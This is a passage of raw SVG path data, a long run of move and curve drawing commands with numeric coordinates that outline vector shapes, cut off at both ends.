0,124.675 0.675,124 1.5,124 C 2.325,124 3,124.675 3,125.5 C 3,126.325 2.325,127 1.5,127 C 0.675,127 0,126.325 0,125.5 z M 1168.9985,121.45361 C 1167.55,120.65197 1167.1304,120.06241 1168,120.05075 C 1169.7862,120.02679 1172.6423,121.69104 1171.9695,122.3638 C 1171.7096,122.6237 1170.3727,122.21411 1168.9985,121.45361 z M 305,118.12244 C 305,116.70496 307.82392,114.77314 308.91252,115.44594 C 310.47276,116.41021 309.00117,119 306.89301,119 C 305.85186,119 305,118.6051 305,118.12244 z M 43.302767,114.43753 C 41.629599,113.17518 41.733638,112.98697 44.75,111.81946 C 46.5375,111.1276 48,110.21018 48,109.78076 C 48,109.35134 49.097033,109 50.437851,109 C 54.39153,109 53.324839,112.56902 48.845249,114.32865 C 45.680565,115.57178 44.828336,115.58852 43.302767,114.43753 z M 27.107001,109.08729 C 26.340852,108.60215 23.415852,108.38474 20.607001,108.60417 C 17.79815,108.8236 15.965056,108.66492 16.533458,108.25156 C 17.101859,107.8382 17.541497,106.825 17.510429,106 C 17.468577,104.88858 16.423686,104.55739 13.476972,104.72153 C 10.879276,104.86623 8.6697857,104.30689 7.1061797,103.10874 C 4.1198702,100.82042 5.1290336,98.758834 8.8112854,99.625438 C 12.264668,100.43818 14.033117,102 11.5,102 C 10.18795,102 9.9209465,102.32095 10.637161,103.03716 C 11.331977,103.73198 12.525185,103.75082 14.252082,103.09426 C 16.33499,102.30234 16.954552,102.43918 17.479471,103.8071 C 17.836766,104.73819 17.987551,105.725 17.814549,106 C 17.285578,106.84084 27.431429,107.76662 28.5,106.97501 C 29.743733,106.05365 36,106.93409 36,108.03049 C 36,108.47241 34.437807,108.71003 32.52846,108.55853 C 30.619113,108.40704 29.295671,108.66939 29.587477,109.14154 C 30.272142,110.24935 28.894566,110.21922 27.107001,109.08729 z M 1.25,104.34923 C -1.0748323,103.38973 -0.018750877,101.865 2.75,102.18358 C 4.2625,102.35761 5.5,102.94384 5.5,103.4863 C 5.5,104.61955 3.0904039,105.10879 1.25,104.34923 z M 425.5201,102.75814 C 423.5545,101.74973 421.39587,101.01492 420.72314,101.12523 C 417.64492,101.62998 413.23796,99.29637 409.05627,94.947279 C 399.67274,85.188122 397.59231,82.451024 397.31502,79.5 C 396.92043,75.300593 398.12457,73.908758 402.34185,73.689619 C 405.02525,73.550184 405.99222,73.05247 405.99552,71.809017 C 406.00086,69.792032 404.33075,68.507738 403.79451,70.116471 C 403.29883,71.603511 395.38273,71.782729 393.93958,70.339583 C 393.13869,69.53869 393.11766,68.648659 393.86658,67.249295 C 394.73493,65.626777 394.52634,65.105217 392.67104,64.259884 C 390.41777,63.233227 389.7806,59.782055 391.36962,57.210956 C 391.84352,56.44418 391.59933,56.216521 390.68098,56.568925 C 389.89839,56.869234 388.99205,56.421666 388.6669,55.574329 C 388.31717,54.662953 387.4309,54.281155 386.49696,54.63954 C 385.62865,54.972742 384.9899,54.852656 385.07753,54.372681 C 385.51766,51.961783 384.7658,51 382.44098,51 C 381.03352,51 380.11421,50.624224 380.39806,50.164943 C 381.34275,48.636402 368.7241,47.04723 361,47.721984 C 350.59789,48.63068 345.54038,48.33971 341.74913,46.614441 C 339.96211,45.801227 337.6,44.948844 336.5,44.720255 C 334.66417,44.338756 334.70522,44.215254 337,43.215706 C 339.43974,42.15302 339.41564,42.123551 336,41.993101 C 334.075,41.919582 331.66887,41.532366 330.65305,41.132621 C 326.16025,39.364621 333.50234,37.45144 349,36.351825 C 356.11095,35.847278 359.849,34 353.75902,34 C 351.75648,34 349.90063,33.648233 349.63491,33.218296 C 349.3692,32.78836 351.93014,32.498648 355.3259,32.574493 C 358.72165,32.650338 361.725,33.069321 362,33.505566 C 362.75837,34.708609 355.81709,36.802412 349.29903,37.336753 C 328.43049,39.047522 325.81919,40.836053 343.49405,41.312698 C 350.82034,41.510269 354.49885,41.996537 354.76766,42.802979 C 355.04619,43.638564 353.25434,44.045241 348.83333,44.149832 C 345.0634,44.23902 343.71424,44.500667 345.5,44.796277 C 348.48275,45.290036 348.48563,45.296882 346,45.98725 C 344.625,46.369148 349.125,46.552808 356,46.395385 C 375.38124,45.951594 387.32468,48.925668 391.62421,55.266277 C 392.65589,56.78773 394.7375,58.58508 396.25,59.260389 C 397.7625,59.935697 399,60.814249 399,61.212727 C 399,61.611204 399.675,61.678209 400.5,61.361626 C 401.32569,61.044778 402,61.331751 402,62 C 402,62.667688 402.6271,62.973338 403.39355,62.679223 C 405.08629,62.029657 408.47721,65.471829 409.93513,69.319685 C 410.78962,71.574913 410.68807,72.454788 409.42785,73.715002 C 408.14884,74.994016 408.10145,75.448649 409.17611,76.130005 C 410.23502,76.801372 410.19977,76.996154 409,77.10317 C 408.175,77.176757 406.89234,77.153551 406.14965,77.051601 C 405.40695,76.949651 405.07496,77.312277 405.41189,77.857436 C 405.74882,78.402596 405.23148,79.07534 404.26224,79.352422 C 403.29301,79.629505 404.3,79.668737 406.5,79.439606 L 410.5,79.023003 L 407.25,80.040094 C 403.22282,81.300404 403.18649,81.820448 407.032,83.161 C 409.63109,84.067046 409.88095,84.443304 408.782,85.796211 C 407.69778,87.130971 407.75722,87.278178 409.16724,86.750373 C 410.17141,86.374489 411.05963,86.713 411.40059,87.601528 C 411.75576,88.527106 411.14837,89.379488 409.77039,89.889233 L 407.5741,90.701696 L 409.81506,91.901021 C 411.04758,92.56065 411.79186,93.527769 411.46899,94.050173 C 411.14613,94.572578 411.56116,95 412.39129,95 C 413.22142,95 414.26048,95.609307 414.70031,96.354015 C 416.20196,98.896568 420.01943,100.17251 424.07486,99.487352 C 426.64276,99.053509 428,99.20038 428,99.912102 C 428,101.87158 431.85654,101.05255 434.34438,98.564713 C 436.45992,96.449172 436.56436,96.045157 435.13983,95.487602 C 433.79801,94.962418 433.99977,94.581388 436.25,93.390952 C 437.7625,92.590797 439,91.500497 439,90.968063 C 439,90.435628 439.7875,89.993109 440.75,89.984687 C 442.24555,89.971601 442.2819,89.828426 441,89 C 439.7517,88.193285 439.8356,88.014809 441.5,87.936365 C 442.6,87.884522 442.9375,87.615132 442.25,87.337719 C 440.21525,86.516679 440.82691,84.721472 442.95205,85.277211 C 444.02568,85.557971 445.03818,85.398468 445.20205,84.922761 C 445.36592,84.447053 446.4,83.919306 447.5,83.749989 C 448.6,83.580672 450.175,83.005158 451,82.47107 C 451.825,81.936981 454.87158,81.468581 457.77018,81.430181 C 461.65212,81.378753 463.75945,80.776453 465.77018,79.143686 C 467.27158,77.924514 469.31295,76.659293 470.30656,76.332084 C 471.35934,75.985387 471.88352,75.13884 471.56285,74.303188 C 471.14036,73.20221 471.53361,73.042557 473.25629,73.61567 C 477.59746,75.059917 492.58175,73.622762 496.94978,71.343208 C 498.3524,70.611221 500.08906,70.009549 500.80902,70.006161 C 503.51841,69.993409 500.87606,68.204343 497.57941,67.819478 C 495.6879,67.598654 494.30197,67.679579 494.49957,67.999311 C 494.98674,68.787568 486.96499,69.087092 484.6343,68.36767 C 482.96262,67.85167 483.05078,67.606665 485.48202,66.011796 C 487.37226,64.771817 487.78658,64.068914 486.84772,63.694855 C 485.99394,63.354689 486.23299,63.103201 487.5,63.008662 C 489.5,62.859429 489.5,62.859429 487.5,61.909189 C 485.80128,61.102093 485.8766,61.050399 488,61.566028 C 489.375,61.899921 492.4345,62.516155 494.79888,62.935436 C 497.16327,63.354718 499.61577,64.215769 500.24888,64.848883 C 500.882,65.481997 502.3225,66.044856 503.45,66.09968 C 505.22347,66.185914 505.16276,66.314274 503,67.051236 C 500.50091,67.902802 500.50086,67.903038 502.8854,67.701556 C 504.19737,67.5907 505.91744,66.521112 506.70778,65.324692 C 508.05936,63.278661 508.00674,63.182087 505.82238,63.699666 C 503.68921,64.205114 503.64374,64.137923 505.2643,62.874974 C 506.82037,61.662286 506.32028,61.484671 501.02734,61.370126 C 494.30609,61.224671 486.78115,58.395306 489.11814,56.892285 C 489.87816,56.40348 491.80506,56.278344 493.40013,56.614204 C 495.85673,57.131469 496.1991,56.961234 495.63879,55.501089 C 495.12254,54.155759 495.36401,53.925999 496.73866,54.454547 C 499.59244,55.551812 509.71418,56.064451 508.03976,55.026918 C 506.79373,54.254826 506.85885,53.813455 508.4837,52.018015 C 510.11444,50.216062 510.14463,50.00727 508.69393,50.563954 C 506.81408,51.285321 506.34848,49.520693 508.12842,48.420634 C 508.898,47.945004 508.73232,47.429701 507.60738,46.800157 C 504.75718,45.205102 506.90415,44.004118 512.80902,43.890434 L 518.5,43.780869 L 514.1119,42.919005 C 509.3917,41.991913 507.7453,40.995728 509.75,40.279762 C 510.4375,40.034226 511,39.195833 511,38.416667 C 511,37.6375 511.87344,37 512.94098,37 C 514.00852,37 515.16008,36.55 515.5,36 C 515.83992,35.45 515.36138,35 514.43657,35 C 512.98305,35 512.94116,34.770639 514.12756,33.308042 C 514.8824,32.377464 515.02851,31.897772 514.45225,32.242059 C 513.87599,32.586345 512.75099,32.454617 511.95225,31.94933 C 510.95927,31.321162 512.23936,30.997797 516,30.926818 C 524.66514,30.763271 531.16714,30.210764 535.5,29.269805 L 539.5,28.401133 L 533.17103,27.707645 C 529.46049,27.301068 526.07449,27.42495 524.98677,28.007078 C 523.96636,28.553185 520.57935,29 517.46009,29 C 514.34082,29 509.08645,29.70022 505.78372,30.556043 C 499.05927,32.298523 496.93203,31.877245 502.42513,29.890912 C 507.57491,28.028727 506.89413,26.597762 501.25,27.420838 C 492.17197,28.744674 485.26258,29.0587 488,28.023039 C 489.70888,27.376511 486.38617,27.195839 477.5,27.452103 C 469.96932,27.669277 465.76215,27.492455 467.5,27.031817 C 469.15,26.594464 476.9125,26.183388 484.75,26.118315 C 494.27839,26.039203 499,25.639535 499,24.912102 C 499,24.207204 497.50377,24.029977 494.75,24.408695 C 491.83009,24.810263 491.12592,24.712458 492.5,24.096182 C 494.36505,23.259704 470.86584,23.449207 460.25,24.356253 C 455.01365,24.803661 454.5435,23.273085 459.75,22.728468 C 462.96894,22.391757 462.78483,22.3124 458.45,22.168103 C 455.6725,22.075646 452.92266,22.477341 452.33924,23.060758 C 451.75583,23.644175 449.41583,24.147223 447.13924,24.178642 C 444.86266,24.210061 443.00008,24.52022 443.00017,24.867884 C 443.00026,25.215548 441.31276,25.542128 439.25017,25.593618 C 428.57486,25.860115 426.91807,26.058416 427.5,27 C 428.25993,28.229587 429.09914,28.278953 419,26.5 C 414.325,25.676504 409.375,25.022416 408,25.046471 C 405.56404,25.089087 405.57592,25.122587 408.46346,26.354161 C 412.86314,28.230679 410.10704,29.136744 403.63731,27.940751 C 399.75843,27.223701 397.44334,27.227548 396.08726,27.953297 C 393.45775,29.360573 392.95788,29.273341 393.62904,27.524314 C 394.09684,26.305267 392.96096,26.060186 387.09766,26.115081 C 383.19395,26.151629 380,26.364397 380,26.587898 C 380,26.811399 381.4625,27.677159 383.25,28.511807 C 385.0375,29.346456 385.6,29.760684 384.5,29.432313 C 383.4,29.103942 380.08136,28.578588 377.12525,28.264859 C 372.70447,27.795687 371.58027,27.99863 370.7914,29.408261 C 370.06388,30.708266 369.09797,30.960792 366.79105,30.454106 C 364.54778,29.961403 363.94547,30.102759 364.49557,30.992835 C 365.06344,31.911665 364.75898,31.941379 363.21935,31.117391 C 361.78158,30.34792 360.31509,30.342798 358.14394,31.099666 C 356.46457,31.685097 354.28267,31.954367 353.29527,31.698044 C 351.9847,31.357828 352.17497,31.181708 354,31.045716 C 359.52425,30.634078 360.0129,29.39188 354.62974,29.444823 C 351.54411,29.47517 349.52732,29.670736 350.14799,29.879413 C 351.69642,30.400017 337.13521,34.96998 333.875,34.98661 C 329.24247,35.01024 325,36.213462 325,37.50368 C 325,39.445032 312.87554,43.65915 310.86504,42.416591 C 310.13065,41.962714 309.95819,42.123331 310.40451,42.845492 C 310.79695,43.480471 311.85648,44 312.75902,44 C 316.21924,44 312.09807,46.266743 307.96021,46.639462 C 302.47566,47.133483 300.68965,48.312828 304.4175,48.978797 C 308.98788,49.795281 308.62469,51.704796 303.69923,52.755295 C 297.173,54.147204 264.34241,53.529068 262.47484,51.97912 C 261.40885,51.094423 261.27538,50.37311 262.01319,49.484104 C 263.41397,47.796267 261.22663,47.026813 254.66821,46.90032 C 248.002,46.771748 244.01863,45.724552 245.86206,44.585251 C 246.6001,44.129115 252.16015,44.077137 258.21772,44.469744 C 265.64302,44.950997 269.02556,44.850366 268.59943,44.160886 C 267.27833,42.023297 270.38528,41.757576 272.08965,43.862386 C 273.06081,45.061718 274.11574,45.621752 274.43393,45.106905 C 274.75212,44.592059 274.44716,43.942912 273.75623,43.664358 C 273.0653,43.385803 273.53906,43.122368 274.80902,43.078947 C 276.07898,43.035526 276.86906,42.597153 276.56476,42.104785 C 275.78183,40.837971 278.76289,39.779097 283.89493,39.501104 C 289.10917,39.218658 292.19111,39.881766 291.42505,41.121278 C 291.12119,41.612922 291.99894,41.501973 293.3756,40.874725 C 295.36209,39.969619 296.72077,40.071234 299.95955,41.367137 C 305.09068,43.420208 308.38778,43.442608 310.05335,41.435714 C 310.76739,40.575357 312.28499,40.069296 313.4258,40.311133 C 314.56661,40.552971 316.625,40.423504 318,40.02343 C 320.35876,39.337117 320.29181,39.253812 316.81489,38.548892 C 314.78807,38.137971 312.74159,38.041674 312.26714,38.334899 C 311.79269,38.628123 310.78618,38.485889 310.03045,38.018822 C 308.15043,36.856906 314.34317,35.284877 324.25,34.409183 C 328.5125,34.032407 332,33.347456 332,32.887068 C 332,32.426681 333.41997,32.333994 335.15549,32.681098 C 337.38932,33.127865 338.10501,32.978921 337.60578,32.171156 C 337.11519,31.377366 337.75261,31.198378 339.70029,31.583014 C 341.24013,31.887108 343.625,31.683856 345,31.131343 C 347.27212,30.218343 347.08981,30.107337 343,29.913554 C 339.59023,29.751993 339.20848,29.595332 341.42433,29.266924 C 343.0327,29.028547 343.86777,28.533472 343.28003,28.166756 C 342.69229,27.80004 346.70645,27.419899 352.20038,27.321997 C 357.69431,27.224095 362.44674,26.886595 362.76134,26.571997 C 364.14247,25.19086 361.27474,24.520902 353.18395,24.334533 C 348.40778,24.224514 339.55,23.859394 333.5,23.523153 C 327.45,23.186913 316.875,23.29455 310,23.762347 C 298.53345,24.542567 297.78937,24.710064 301,25.788286 C 304.06292,26.816903 303.51737,26.891471 296.63138,26.385408 C 290.62945,25.944315 288.93954,26.093163 289.50794,27.012844 C 290.06651,27.916638 289.24549,28.048321 286.22918,27.53872 C 283.72622,27.115847 281.95516,27.263532 281.54361,27.929441 C 281.11088,28.629606 282.43888,29 285.38197,29 C 287.85697,29 290.16008,29.45 290.5,30 C 290.83992,30.55 291.65398,30.993109 292.30902,30.984687 C 293.04,30.975289 292.92065,30.564135 292,29.92017 C 290.89486,29.147158 291.55296,29.029669 294.5,29.473853 C 296.7,29.805441 300.24107,30.336849 302.36905,30.654759 C 304.49703,30.972669 306.52203,30.792861 306.86905,30.255184 C 307.21607,29.717508 309.75,28.998871 312.5,28.658212 C 315.85528,28.242574 316.84211,28.33827 315.5,28.949131 C 313.63692,29.797112 313.67115,29.872341 316,30.04803 C 318.35527,30.225711 318.32632,30.280823 315.5,31 C 313.85,31.419854 309.66094,31.816612 306.19098,31.881685 C 302.26648,31.955283 300.11555,32.377954 300.5,33 C 300.83992,33.55 302.32898,34.006891 303.80902,34.015313 C 305.91378,34.02729 306.17323,34.241799 305,35 C 303.20439,36.160411 298.67636,36.332679 299.36756,35.214286 C 299.63464,34.782143 299.0987,34.347562 298.17658,34.24855 C 297.25446,34.149538 293.8,33.794618 290.5,33.459838 L 284.5,32.851148 L 287.5,34.511369 C 289.15,35.42449 292.95866,36.430863 295.96369,36.747752 C 298.97371,37.065168 300.6686,37.590076 299.73778,37.91659 C 297.53828,38.688134 280.10659,38.439926 279.29213,37.625466 C 278.94813,37.28146 280.11822,37 281.89235,37 C 283.79603,37 284.86381,36.588658 284.49773,35.99633 C 284.15657,35.444311 282.78001,35.268095 281.43871,35.604738 C 279.95242,35.977775 279,35.783938 279,35.108408 C 279,34.498784 277.90156,34 276.55902,34 C 275.21648,34 273.79695,33.480471 273.40451,32.845492 C 272.97864,32.156422 273.12857,31.961424 273.77639,32.361803 C 274.37337,32.730755 275.14446,32.575283 275.48992,32.016312 C 276.3225,30.669172 274.42091,30.720192 272.20433,32.104465 C 270.86372,32.941689 269.50665,32.820707 266.59578,31.604465 C 262.43596,29.866381 256.52774,29.426848 257.45323,30.924318 C 257.76742,31.432693 257.35583,31.995193 256.53858,32.174318 C 253.29858,32.884461 256.84089,34.976755 261.54933,35.133966 C 269.66514,35.404947 271.44895,36.839432 264,37.104717 C 258.9529,37.284463 258.39409,37.435017 261.5,37.77827 C 264.85537,38.149091 265.17768,38.366688 263.5,39.128477 C 262.09655,39.765745 262.69309,39.858822 265.5,39.440531 C 267.7,39.112681 270.75627,38.725669 272.29172,38.580503 C 273.82716,38.435338 275.60466,37.795339 276.24172,37.158283 C 277.76587,35.634128 279.06368,35.681583 278.75,37.25 C 278.37762,39.111876 274.88572,40.846835 272.41315,40.398473 C 271.21851,40.181843 269.68173,40.678565 268.99809,41.5023 C 268.31445,42.326035 267.06021,43 266.21089,43 C 265.36157,43 264.97926,42.687406 265.36132,42.305346 C 265.74338,41.923287 263.68088,40.874252 260.77799,39.974157 C 257.71983,39.025921 255.61449,37.818021 255.77221,37.102191 C 255.92192,36.422703 255.24692,35.955183 254.27221,36.063256 C 251.76208,36.341572 246,34.897433 246,33.99001 C 246,31.870949 252.97221,29.164318 260,28.555172 C 261.925,28.388319 265.92392,27.745148 268.88649,27.125902 C 271.84906,26.506656 275.67406,26.053242 277.38649,26.118315 L 280.5,26.23663 L 277.5,27 L 274.5,27.76337 L 277.20031,27.881685 C 278.68548,27.946758 280.26048,27.363036 280.70031,26.584525 C 281.23033,25.64638 284.02916,24.989106 289,24.635442 C 293.125,24.341957 302.125,23.603716 309,22.994905 C 316.48356,22.332204 328.52302,22.153091 339,22.548589 C 362.3386,23.429605 363.85879,23.529506 368.48333,24.486139 C 371.84196,25.180902 372.15562,25.442053 370.48333,26.15131 C 369.35659,26.629192 370.8754,26.670193 374,26.246245 C 377.025,25.83581 385.0125,25.502203 391.75,25.504896 C 398.4875,25.507589 404,25.124681 404,24.653989 C 404,24.183297 406.5875,23.912549 409.75,24.052326 C 420.23354,24.515682 425.66381,24.084022 424,22.919572 C 422.92735,22.168857 425.70512,21.980846 433.75,22.259652 C 439.9375,22.474087 445,22.278389 445,21.824767 C 445,20.579921 488.77178,20.870665 494,22.150238 C 496.475,22.755978 499.85,23.195885 501.5,23.127809 C 503.15,23.059732 505.85,23.414447 507.5,23.916064 C 509.23566,24.443721 509.73156,24.864319 508.67668,24.914047 C 507.4897,24.970002 506.97957,25.610758 507.21499,26.75 C 507.43582,27.818606 508.34045,28.40159 509.53831,28.247256 C 520.92338,26.780401 535.31438,26.602273 541,27.857831 C 544.36119,28.600085 544.22238,28.682305 537.5,29.930932 C 533.65,30.646039 528.5303,32.079122 526.12288,33.115563 C 523.71547,34.152003 520.56547,35.031628 519.12288,35.070285 C 516.7989,35.132561 516.72792,35.230391 518.5,35.928749 C 520.21666,36.605266 520.00415,36.824475 517,37.476061 C 515.075,37.893584 513.11446,38.463525 512.64324,38.742597 C 511.4495,39.449565 514.07693,40.966179 516.52749,40.984687 C 517.64262,40.993109 519.57657,41.715543 520.82517,42.590095 C 522.62606,43.851491 522.85346,44.471641 521.92523,45.590095 C 521.0626,46.6295 521.04779,47.352658 521.86888,48.342009 C 522.48145,49.080114 522.71704,49.949625 522.39241,50.274256 C 522.06778,50.598887 522.81705,50.599097 524.05746,50.274723 C 525.61661,49.866995 526.09193,50.042241 525.59735,50.842476 C 524.7012,52.292478 519,52.377604 519,50.940983 C 519,50.358524 519.46115,50.166972 520.02478,50.515313 C 521.56982,51.470202 520.7192,48.701266 519,47.17946 C 517.89989,46.205661 517.87443,46.045943 518.90451,46.580351 C 519.8279,47.059412 520.0646,46.91354 519.59549,46.154508 C 519.16844,45.463525 519.53159,45 520.5,45 C 521.4105,45 521.82423,44.524619 521.44615,43.912868 C 520.96233,43.130025 520.46998,43.130025 519.68713,43.912868 C 519.08921,44.51079 517.04,45 515.13333,45 C 511.84255,45 511.27119,45.834513 514.15837,46.423994 C 516.5951,46.921506 519,48.201387 519,49.000691 C 519,49.433384 517.14061,49.369628 514.86802,48.859012 C 512.59544,48.348396 510.51036,48.156305 510.23452,48.432144 C 509.95868,48.707983 511.60815,49.233518 513.9,49.6 C 516.19185,49.966482 517.83392,50.499412 517.54904,50.784288 C 517.26417,51.069165 517.81159,51.894929 518.76554,52.61932 C 520.36175,53.831412 520.31816,53.938928 518.21862,53.968197 C 516.96385,53.985688 515.67821,54.675 515.36163,55.5 C 515.04504,56.325 513.59667,57.001026 512.14301,57.00228 C 509.89767,57.004218 509.48398,57.455603 509.39352,60.00228 C 509.33495,61.651026 509.67245,63 510.14352,63 C 511.47409,63 511.15163,66.629265 509.71514,67.821446 C 509.00847,68.407931 505.29597,69.999415 501.46514,71.358076 C 494.93728,73.673283 492.34564,74.203202 481,75.542642 C 473.68952,76.4057 471.66345,77.032807 468.5,79.411628 C 465.12162,81.952071 459.19026,84.235622 457.95423,83.471712 C 457.50541,83.194327 456.85554,83.424717 456.51008,83.983688 C 456.16462,84.54266 454.07638,85 451.86955,85 C 448.07548,85 444.36914,87.035808 445.71429,88.380952 C 446.05476,88.721429 445.80833,89 445.16667,89 C 444.525,89 444,89.575658 444,90.279241 C 444,90.982823 443.07433,92.220323 441.94295,93.029241 C 440.81157,93.838158 439.06256,96.354428 438.05626,98.62095 C 435.21842,105.01274 431.99093,106.07787 425.5201,102.75814 z M 406.38691,87.817021 C 406.0981,87.349717 405.4429,87.226274 404.9309,87.542705 C 403.62252,88.35133 403.76984,88.666667 405.45601,88.666667 C 406.25682,88.666667 406.67572,88.284326 406.38691,87.817021 z M 407.5,85 C 407.83992,84.45 407.44303,84 406.61803,84 C 405.79303,84 404.83992,84.45 404.5,85 C 404.16008,85.55 404.55697,86 405.38197,86 C 406.20697,86 407.16008,85.55 407.5,85 z M 403.59744,65.765313 C 402.99385,65.361235 401.68594,65.023735 400.69098,65.015313 C 399.69554,65.006887 399.17106,64.532239 399.52477,63.959918 C 399.94789,63.275298 399.19909,63.161106 397.33379,63.625792 C 394.7746,64.26334 394.63299,64.170323 395.87244,62.665874 C 397.38355,60.831693 396.35004,60.472611 394,62.015313 C 392.66667,62.89059 392.66667,63.10941 394,63.984687 C 394.825,64.526265 396.4,65.007894 397.5,65.054972 C 399.5,65.140571 399.5,65.140571 397.5,66.046696 C 396.11854,66.672584 396.73708,66.756971 399.5,66.319555 C 403.10148,65.74938 403.36677,65.847131 402.16278,67.3007 C 401.23884,68.416162 399.92534,68.735067 397.91278,68.332556 C 394.47277,67.644554 394.02484,68.702933 397.25,69.898575 C 398.92292,70.518766 400.16619,70.189902 402.09744,68.616351 C 403.77989,67.245521 404.30829,66.241194 403.59744,65.765313 z M 499.573,65.478529 C 497.51792,63.923769 496.36955,64.170889 497.45888,65.933469 C 497.82142,66.520061 498.87898,66.985688 499.80902,66.968197 C 501.29367,66.940274 501.26487,66.758504 499.573,65.478529 z M 494.5,65 C 494.16008,64.45 492.67102,64.053242 491.19098,64.118315 L 488.5,64.23663 L 491.5,65 C 493.15,65.419854 494.63906,65.816612 494.80902,65.881685 C 494.97898,65.946758 494.83992,65.55 494.5,65 z M 498.44236,59.093259 C 498.75058,58.594551 498.10214,58.422035 497.00138,58.70989 C 494.66639,59.320503 494.37123,60 496.44098,60 C 497.23352,60 498.13414,59.591966 498.44236,59.093259 z M 292.48843,51.841394 C 292.85259,51.47916 294.51374,51.573746 296.17986,52.051584 C 298.2327,52.640331 300.22308,52.493996 302.35459,51.597609 L 305.5,50.274837 L 299.96088,49.548543 C 296.91436,49.149081 292.18936,49.126051 289.46088,49.497364 C 283.90536,50.253402 283.58362,50.263479 276.25,49.911103 C 273.3625,49.772361 271,49.276803 271,48.809865 C 271,48.342926 269.9014,48.1601 268.55866,48.403585 C 267.17769,48.654002 265.60431,48.228154 264.93621,47.423142 C 264.28661,46.640414 263.02271,46.013684 262.12756,46.030409 C 260.66401,46.057753 260.67026,46.160124 262.18953,47.046258 C 263.11877,47.588251 263.71445,48.886426 263.51327,49.931093 C 263.18667,51.626969 263.73909,51.812713 268.66883,51.664599 C 271.70558,51.57336 274.33034,51.724 274.50163,51.999355 C 274.9686,52.749999 291.7229,52.602861 292.48843,51.841394 z M 512.5,52 C 512.83992,51.45 512.66803,51 512.11803,51 C 511.56803,51 510.83992,51.45 510.5,52 C 510.16008,52.55 510.33197,53 510.88197,53 C 511.43197,53 512.16008,52.55 512.5,52 z M 301.25086,47.086941 C 301.66383,46.708179 299.41383,46.510426 296.25086,46.647492 C 293.08789,46.784557 286.45,46.951572 281.5,47.018636 C 275.28092,47.102894 273.11798,47.417967 274.5,48.038318 C 276.69589,49.023998 300.04421,48.19363 301.25086,47.086941 z M 256.76166,45.31292 C 255.80557,45.062627 254.00557,45.053546 252.76166,45.292739 C 251.51775,45.531932 252.3,45.736717 254.5,45.747817 C 256.7,45.758916 257.71775,45.563212 256.76166,45.31292 z M 307.41642,44.864773 C 307.14916,44.432331 304.24876,44.187776 300.97108,44.321317 C 295.7486,44.534096 295.28918,44.409965 297.25584,43.317496 C 299.65667,41.98384 299.64434,41.961362 296.30711,41.587993 C 295.10102,41.453056 294.20102,41.828056 294.30711,42.421326 C 294.52389,43.63361 289.0322,43.760665 284.66621,42.644376 C 282.79597,42.166195 282.05099,42.273485 282.47523,42.959918 C 282.87429,43.60561 281.76849,44 279.55902,44 C 277.60156,44 276,44.347177 276,44.771505 C 276,45.195832 283.17803,45.567314 291.95118,45.59702 C 300.72433,45.626726 307.68369,45.297215 307.41642,44.864773 z M 282,33 C 282,32.45 281.2125,32.006891 280.25,32.015313 C 278.75445,32.028399 278.7181,32.171574 280,33 C 281.88721,34.21961 282,34.21961 282,33 z M 268.93548,29.465472 C 267.65139,28.778246 265.91838,28.477827 265.08435,28.797875 C 263.98238,29.220738 264.37858,29.711415 266.53396,30.593177 C 270.19804,32.09214 272.13976,31.180347 268.93548,29.465472 z M 278.25,29.337719 C 277.5625,29.060307 276.4375,29.060307 275.75,29.337719 C 275.0625,29.615132 275.625,29.842105 277,29.842105 C 278.375,29.842105 278.9375,29.615132 278.25,29.337719 z M 369.48188,29.029317 C 370.32786,27.660493 365.60709,26.66023 362.82217,27.618218 C 360.66898,28.358896 360.75469,28.465042 364,29.076871 C 365.925,29.439787 367.81094,29.795956 368.19098,29.868359 C 368.57102,29.940761 369.15193,29.563193 369.48188,29.029317 z M 367.25,25.337719 C 366.5625,25.060307 365.4375,25.060307 364.75,25.337719 C 364.0625,25.615132 364.625,25.842105 366,25.842105 C 367.375,25.842105 367.9375,25.615132 367.25,25.337719 z M 504.75,24.310674 C 503.7875,24.059147 502.2125,24.059147 501.25,24.310674 C 500.2875,24.562202 501.075,24.767997 503,24.767997 C 504.925,24.767997 505.7125,24.562202 504.75,24.310674 z M 470.73097,22.307009 C 469.758,22.053466 468.408,22.07014 467.73097,22.344063 C 467.05394,22.617986 467.85,22.825431 469.5,22.805051 C 471.15,22.784672 471.70394,22.560553 470.73097,22.307009 z M 580.43026,103.67885 C 579.6296,101.59236 580.62996,100.22996 581.97503,101.57503 C 582.54305,102.14305 582.55778,103.0975 582.01215,103.98033 C 581.24492,105.22174 581.00475,105.17596 580.43026,103.67885 z M 346,102.46862 C 346,100.85123 347.56262,100.48329 348.43524,101.89522 C 348.73954,102.38758 348.3161,103.04846 347.49426,103.36383 C 346.5866,103.71213 346,103.3607 346,102.46862 z M 357.09549,99.059017 C 356.10095,98.444357 356.07329,98.072736 356.98037,97.512132 C 357.63701,97.106305 358.62426,97.224265 359.17426,97.774265 C 360.47748,99.077482 358.80143,100.11334 357.09549,99.059017 z M 304.44615,97.912868 C 303.58802,96.524389 305.49011,94.566834 306.86919,95.419157 C 308.01765,96.128941 307.28228,99 305.95203,99 C 305.49333,99 304.81569,98.51079 304.44615,97.912868 z M 291.73557,96.402234 C 290.26309,94.929754 292.45896,93 295.60699,93 C 299.63114,93 299.99613,94.225104 296.45295,95.839485 C 293.581,97.148032 292.59856,97.26523 291.73557,96.402234 z M 296,95 C 297.21948,94.211914 297.09025,94.027762 295.30902,94.015313 C 294.10398,94.006891 292.83992,94.45 292.5,95 C 291.71313,96.273187 294.02988,96.273187 296,95 z M 1251.2489,92.969282 C 1250.0108,92.471171 1248.3233,92.322454 1247.4989,92.638801 C 1246.6021,92.982914 1246,92.645411 1246,91.798669 C 1246,90.791114 1247.0804,90.446163 1249.75,90.601348 C 1253.3162,90.808649 1259.7916,92.803146 1257.3318,92.936614 C 1256.6893,92.971476 1255.5643,93.196862 1254.8318,93.43747 C 1254.0993,93.678079 1252.487,93.467394 1251.2489,92.969282 z M 310.96641,91.958076 C 309.93017,91.302691 310.74673,91.026134 313.75,91.015313 C 316.0875,91.006891 317.99911,91.3375 317.99801,91.75 C 317.99505,92.868159 312.65519,93.026174 310.96641,91.958076 z M 516.5,92.021184 C 515.4,91.536846 512.5875,91.108942 510.25,91.070285 C 505.68584,90.994804 505.06674,90.402899 507.60823,88.54452 C 508.95155,87.562256 508.6633,87.388465 505.85823,87.489429 C 501.2638,87.654798 499.83688,86.68672 503.5,85.889518 L 506.5,85.23663 L 503,85.085046 L 499.5,84.933461 L 501.86078,82.966731 C 504.49832,80.769445 509.11249,80.281073 508.63251,82.25 C 508.46491,82.9375 508.51654,83.1625 508.74723,82.75 C 509.48661,81.427905 511.76605,81.947961 512.39301,83.581787 C 513.25966,85.840231 513.17693,86.005123 